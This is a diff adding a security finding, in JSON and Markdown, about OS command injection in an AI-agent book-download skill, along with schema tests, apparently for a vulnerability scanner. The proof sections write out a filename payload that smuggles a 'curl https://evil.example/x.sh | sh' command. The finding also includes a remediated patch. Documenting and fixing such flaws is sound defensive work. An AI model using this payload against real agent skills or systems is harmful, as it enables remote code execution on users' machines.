Agent-Field · Amr-Saad · Jun 7, 2026 · Jun 9, 2026 · Jun 9, 2026
diff --git a/exampl/zlibrary-to-notebooklm-command-injection.finding.json b/exampl/zlibrary-to-notebooklm-command-injection.finding.json
@@ -0,0 +1,65 @@
+{
+  "_note": "Community-contributed real-world finding demonstrating the OS command-injection class SEC-AF detects in AI-agent skills. The vulnerable project is an MIT-licensed Claude/agent 'skill' (zlibrary-to-notebooklm) whose automation downloads a book and shells out to the NotebookLM CLI. This finding was confirmed by data-flow analysis and has been remediated (see `remediation`); it is provided as an example/fixture, not a live 0-day. Field shape conforms to sec_af.schemas.prove.VerifiedFinding so it loads via VerifiedFinding.model_validate(...).",
+  "id": "af-zl2nlm-cmdi-0001",
+  "fingerprint": "af-zl2nlm-cmdi-0001",
+  "title": "OS Command Injection via Attacker-Controlled Book Filename in zlibrary-to-notebooklm upload.py",
+  "description": "scripts/upload.py builds NotebookLM CLI and epub-conversion commands as Python f-strings and runs them via subprocess.run(..., shell=True). The interpolated `title`, `file_path`, and `chunk_file` all derive from `download.suggested_filename` - the filename of a book fetched from Z-Library, which is controlled by whoever uploaded that book. A book named with shell metacharacters (e.g. a single-quote to break out of the quoting, followed by `; <command>; '`) causes the agent to execute arbitrary OS commands on the victim's machine when the skill processes the download. There are seven such sinks (one in convert_to_txt, six in upload_to_notebooklm across the multi-chunk and single-file branches).",
+  "finding_type": "sast",
+  "cwe_id": "CWE-78",
+  "cwe_name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')",
+  "owasp_category": "A03:2021 - Injection",
+  "tags": ["command-injection", "ai-agent-skill", "subprocess", "shell-true", "cwe-78", "externally_reachable"],
+  "verdict": "confirmed",
+  "evidence_level": 5,
+  "rationale": "Static data-flow analysis confirms the attacker-controlled Z-Library filename (download.suggested_filename) reaches seven subprocess.run(..., shell=True) sinks in scripts/upload.py without sanitisation. The single quotes wrapping the interpolated values in the f-strings are not a defence: a single-quote inside the filename closes the quoting and lets following shell metacharacters execute. Verdict CONFIRMED at evidence level 5 (EXPLOIT_SCENARIO_VALIDATED) - a concrete exploit input is demonstrated and the source-to-sink path is verified; it is not level 6 (FULL_EXPLOIT) because no live PoC was executed against a victim host. Severity is CRITICAL per SEC-AF's CWE-78 RCE floor (sec_af.scoring.apply_cwe_severity_floor). The stored exploitability_score matches what sec_af.scoring.compute_exploitability_score produces for this finding: critical (10.0) x EXPLOIT_SCENARIO_VALIDATED evidence (0.9) x external reachability (1.0, the taint source is a remote attacker-controlled filename, tagged externally_reachable) x no-chain (1.0) = 9.0; sarif_security_severity mirrors it.",
+  "severity": "critical",
+  "exploitability_score": 9.0,
+  "proof": {
+    "exploit_hypothesis": "An attacker uploads a book to Z-Library named:  '; curl https://evil.example/x.sh | sh; '.epub  . The leading single-quote closes the quoting in the f-string, the `;` terminates the intended command, and the injected `curl | sh` runs with the privileges of the user running the skill. When the victim runs the skill on that book (the skill auto-downloads and processes it), the agent shells out via /bin/sh -c and the payload executes -> remote code execution. The wrapping single-quotes in the f-strings are not a defence: a `'` in the filename escapes them.",
+    "verification_method": "Static source-to-sink taint tracing over scripts/upload.py: the tainted filename is followed from download.suggested_filename through the saved download path into seven f-string-built commands executed with shell=True. No dynamic exploit was run against a live host (no DAST / no PoC execution), hence evidence level 5 rather than 6.",
+    "evidence_level": 5,
+    "vulnerable_code": "cmd = f\"nlm source add '{file_path}' --json\"\nresult = subprocess.run(cmd, shell=True, capture_output=True, text=True)",
+    "exploit_payload": "'; curl https://evil.example/x.sh | sh; '.epub",
+    "expected_outcome": "Arbitrary OS commands execute with the privileges of the user running the skill -> remote code execution on the victim host.",
+    "data_flow_evidence": {
+      "source": "download.suggested_filename in download_from_zlibrary() - the Z-Library book filename, attacker-controllable by the book uploader",
+      "sink": "subprocess.run(cmd, shell=True) in convert_to_txt() and upload_to_notebooklm()",
+      "sink_reached": true,
+      "steps": [
+        { "file": "scripts/upload.py", "line": 130, "tainted": true, "description": "suggested_filename = download.suggested_filename  -- taint enters from the remote book's filename" },
+        { "file": "scripts/upload.py", "line": 132, "tainted": true, "description": "download_path = self.downloads_dir / suggested_filename  -- taint propagates into the saved path" },
+        { "file": "scripts/upload.py", "line": 296, "tainted": true, "description": "return download_path, downloaded_format  -- returned to main(), passed to convert_to_txt()/upload_to_notebooklm()" },
+        { "file": "scripts/upload.py", "line": 525, "tainted": true, "description": "title = file_path.stem.replace('_', ' ')  -- title derived from the tainted filename stem" },
+        { "file": "scripts/upload.py", "line": 432, "tainted": true, "description": "cmd = f\"python3 '{convert_script}' '{file_path}' '{md_file}'\"  -- tainted path interpolated into a shell string" },
+        { "file": "scripts/upload.py", "line": 554, "tainted": true, "description": "cmd = f\"nlm source add '{file_path}' --json\"  -- tainted path interpolated into a shell string" },
+        { "file": "scripts/upload.py", "line": 555, "tainted": true, "description": "subprocess.run(cmd, shell=True, ...)  -- SINK: shell=True executes the interpolated string via /bin/sh -c" }
+      ]
+    }
+  },
+  "location": {
+    "file_path": "scripts/upload.py",
+    "function_name": "upload_to_notebooklm / convert_to_txt",
+    "start_line": 432,
+    "end_line": 555,
+    "code_snippet": "cmd = f\"nlm source add '{file_path}' --json\"\nresult = subprocess.run(cmd, shell=True, capture_output=True, text=True)"
+  },
+  "compliance": [
+    { "framework": "OWASP", "control_id": "A03:2021", "control_name": "Injection" },
+    { "framework": "CWE", "control_id": "CWE-78", "control_name": "OS Command Injection" },
+    { "framework": "PCI-DSS", "control_id": "Req 6.2.4", "control_name": "Custom software addresses common coding vulnerabilities" },
+    { "framework": "SOC2", "control_id": "CC6", "control_name": "Logical and physical access controls" },
+    { "framework": "ISO27001", "control_id": "A.8.28", "control_name": "Secure coding" }
+  ],
+  "remediation": {
+    "fix_description": "Pass arguments as a list with shell=False (the subprocess default) so the interpolated, attacker-controlled values are treated as data, never shell tokens. All seven invocations refactored to list-argv; binary name, JSON parsing, return shapes, retry/error handling, and sequential upload behaviour preserved. Verified with `python -m py_compile` and a zero-`shell=True` grep.",
+    "patch_diff": "--- a/scripts/upload.py\n+++ b/scripts/upload.py\n@@ def upload_to_notebooklm(self, file_path):\n-        cmd = f\"nlm source add '{file_path}' --json\"\n-        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)\n+        result = subprocess.run(\n+            [\"nlm\", \"source\", \"add\", str(file_path), \"--json\"],\n+            capture_output=True,\n+            text=True,\n+        )\n@@ def convert_to_txt(self, file_path, md_file):\n-        cmd = f\"python3 '{convert_script}' '{file_path}' '{md_file}'\"\n-        subprocess.run(cmd, shell=True, ...)\n+        subprocess.run(\n+            [\"python3\", str(convert_script), str(file_path), str(md_file)],\n+            ...\n+        )",
+    "confidence": "high"
+  },
+  "sarif_rule_id": "sec-af/python/os-command-injection-shell-true",
+  "sarif_security_severity": 9.0,
+  "references": [
+    "https://cwe.mitre.org/data/definitions/78.html",
+    "https://owasp.org/Top10/A03_2021-Injection/",
+    "https://docs.python.org/3/library/subprocess.html#security-considerations"
+  ]
+}
diff --git a/exampl/zlibrary-to-notebooklm-command-injection.md b/exampl/zlibrary-to-notebooklm-command-injection.md
@@ -0,0 +1,79 @@
+# Finding — OS Command Injection in an AI-Agent Skill (`zlibrary-to-notebooklm`)
+
+> Community-contributed real-world finding, in SEC-AF's verdict → trace → evidence style. It demonstrates the OS command-injection class SEC-AF detects in **AI-agent skills** — automation that an agent runs on attacker-influenced input. The vulnerable project is an MIT-licensed agent "skill" that downloads a book and shells out to the NotebookLM CLI. **Already remediated** (fix below); provided as an example/fixture, not a live 0-day.
+
+| | |
+|---|---|
+| **Title** | OS Command Injection via attacker-controlled book filename in `scripts/upload.py` |
+| **Severity** | Critical (SEC-AF CWE-78 RCE floor) |
+| **Verdict** | `confirmed` — full source → sink data flow, no sanitisation |
+| **Evidence level** | 5 / 6 |
+| **Exploitability** | 9.0 / 10 (critical × evidence-5 × externally-reachable) |
+| **CWE** | [CWE-78](https://cwe.mitre.org/data/definitions/78.html) (OS Command Injection) |
+| **OWASP** | A03:2021 — Injection |
+| **Sinks** | 7 × `subprocess.run(..., shell=True)` (1 in `convert_to_txt`, 6 in `upload_to_notebooklm`) |
+| **Status** | **Fixed** — refactored to list-argv, `shell=False` |
+
+## Why this matters for AI agents
+
+This is the failure mode that makes agent skills dangerous: the skill **auto-downloads** a file from an untrusted source (Z-Library) and then **shells out** using values derived from that file's name. The agent never "decided" to run a shell command — a crafted filename did. Patterns flag `shell=True`; SEC-AF proves the *reachable data flow* from the remote filename to the shell sink.
+
+## Data-flow trace (source → sink)
+
+**Source:** `download.suggested_filename` — the book's filename, set by whoever uploaded it to Z-Library (attacker-controllable).
+
+```
+scripts/upload.py:130  suggested_filename = download.suggested_filename          # taint in
+scripts/upload.py:132  download_path = self.downloads_dir / suggested_filename   # path tainted
+scripts/upload.py:296  return download_path, downloaded_format                   # -> main() -> convert/upload
+scripts/upload.py:525  title = file_path.stem.replace('_', ' ')                  # title tainted
+scripts/upload.py:432  cmd = f"python3 '{convert_script}' '{file_path}' '{md_file}'"   # interpolated
+scripts/upload.py:554  cmd = f"nlm source add '{file_path}' --json"              # interpolated
+scripts/upload.py:555  subprocess.run(cmd, shell=True, ...)                      # SINK
+```
+
+**Sink:** `subprocess.run(cmd, shell=True)` — the string goes to `/bin/sh -c`, so shell metacharacters in the filename are interpreted, not escaped. The wrapping single-quotes are not a defence: a `'` in the filename closes them.
+
+## Proof of exploitability
+
+A book uploaded to Z-Library named:
+
+```
+'; curl https://evil.example/x.sh | sh; '.epub
+```
+
+When the victim runs the skill on it, the `'` breaks out of the quoting, `;` ends the intended command, and `curl … | sh` executes with the user's privileges → **remote code execution** on the machine running the agent. No further interaction required beyond processing the download.
+
+## Remediation (applied)
+
+Pass arguments as a list with `shell=False` (the subprocess default) so the tainted value is data, never a shell token:
+
+```python
+# before (vulnerable)
+cmd = f"nlm source add '{file_path}' --json"
+result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
+
+# after (safe)
+result = subprocess.run(["nlm", "source", "add", str(file_path), "--json"],
+                        capture_output=True, text=True)
+```
+
+All seven invocations were refactored this way. Binary name (`nlm`), JSON parsing, return shapes, retry/error handling, and the sequential one-chunk-at-a-time upload behaviour were preserved. Verified: `python -m py_compile` passes and zero `shell=True` remain.
+
+## Compliance mapping
+
+| Framework | Control |
+|---|---|
+| OWASP | A03:2021 — Injection |
+| CWE | CWE-78 — OS Command Injection |
+| PCI-DSS | Req 6.2.4 — common coding vulnerabilities |
+| SOC2 | CC6 — access controls |
+| ISO 27001 | A.8.28 — secure coding |
+
+## References
+
+- [CWE-78](https://cwe.mitre.org/data/definitions/78.html)
+- [OWASP A03:2021 Injection](https://owasp.org/Top10/A03_2021-Injection/)
+- [Python `subprocess` security considerations](https://docs.python.org/3/library/subprocess.html#security-considerations)
+
+*Structured finding (SEC-AF schema): [`zlibrary-to-notebooklm-command-injection.finding.json`](./zlibrary-to-notebooklm-command-injection.finding.json).*
diff --git a/tests/test_example_findings.py b/tests/test_example_findings.py
@@ -0,0 +1,85 @@
+"""Schema-compatibility tests for the committed example findings.
+
+Example `*.finding.json` files under `exampl/` are advertised as SEC-AF
+findings, so consumers must be able to load them with the repository schema
+(`sec_af.schemas.prove.VerifiedFinding`). This guards against a fixture that
+omits required schema fields or carries non-schema-shaped nested objects
+(`Proof`, `RemediationSuggestion`) - which Pydantic would reject at import time.
+"""
+
+from __future__ import annotations
+
+import json
+import pathlib
+
+import pytest
+
+from sec_af.scoring import apply_cwe_severity_floor, compute_exploitability_score
+from sec_af.schemas.prove import EvidenceLevel, Verdict, VerifiedFinding
+
+_EXAMPLE_DIR = pathlib.Path(__file__).resolve().parents[1] / "exampl"
+_FINDING_FIXTURES = sorted(_EXAMPLE_DIR.glob("*.finding.json"))
+
+
+def _fixture_id(path: pathlib.Path) -> str:
+    return path.name
+
+
+@pytest.mark.parametrize("fixture", _FINDING_FIXTURES, ids=_fixture_id)
+def test_example_finding_loads_as_verified_finding(fixture: pathlib.Path) -> None:
+    """Every `exampl/*.finding.json` must validate against VerifiedFinding."""
+    data = json.loads(fixture.read_text(encoding="utf-8"))
+
+    finding = VerifiedFinding.model_validate(data)
+
+    # Core required fields resolve to their typed values.
+    assert finding.title
+    assert finding.fingerprint
+    assert isinstance(finding.verdict, Verdict)
+    assert isinstance(finding.evidence_level, EvidenceLevel)
+    assert finding.rationale, "rationale is a required VerifiedFinding field"
+    assert finding.sarif_rule_id, "sarif_rule_id is a required VerifiedFinding field"
+    assert finding.sarif_security_severity >= 0.0
+
+    # If a proof is supplied it must be a fully-formed Proof, not a bag of
+    # non-schema keys - the failure mode this fixture previously exhibited.
+    if finding.proof is not None:
+        assert finding.proof.exploit_hypothesis
+        assert finding.proof.verification_method
+        assert isinstance(finding.proof.evidence_level, EvidenceLevel)
+
+    # Likewise for remediation -> RemediationSuggestion.
+    if finding.remediation is not None:
+        assert finding.remediation.fix_description
+        assert finding.remediation.patch_diff
+        assert finding.remediation.confidence in {"high", "medium", "low"}
+
+
+@pytest.mark.parametrize("fixture", _FINDING_FIXTURES, ids=_fixture_id)
+def test_example_finding_agrees_with_platform_scoring(fixture: pathlib.Path) -> None:
+    """Stored severity/scores must equal what SEC-AF's own engine would emit.
+
+    Mirrors the orchestrator's post-verdict scoring pass (orchestrator.py:
+    apply_cwe_severity_floor -> compute_exploitability_score ->
+    sarif_security_severity = exploitability_score). If a committed example
+    disagrees with the platform's recomputation, tests/docs built from the
+    fixture would mislead - so we pin the fixture to the engine's output.
+    """
+    finding = VerifiedFinding.model_validate(
+        json.loads(fixture.read_text(encoding="utf-8"))
+    )
+
+    # Severity must already sit at/above the CWE floor (e.g. CWE-78 -> critical),
+    # so the engine's floor pass would not change it.
+    assert finding.severity == apply_cwe_severity_floor(finding.cwe_id, finding.severity)
+
+    # Stored exploitability_score must match the engine's recomputation, and
+    # sarif_security_severity must mirror it.
+    expected_score = compute_exploitability_score(finding)
+    assert finding.exploitability_score == pytest.approx(expected_score)
+    assert finding.sarif_security_severity == pytest.approx(finding.exploitability_score)
+
+
+def test_at_least_one_example_finding_present() -> None:
+    """Fail loudly if the example-finding fixtures disappear or are renamed."""
+    assert _FINDING_FIXTURES, f"no *.finding.json fixtures found in {_EXAMPLE_DIR}"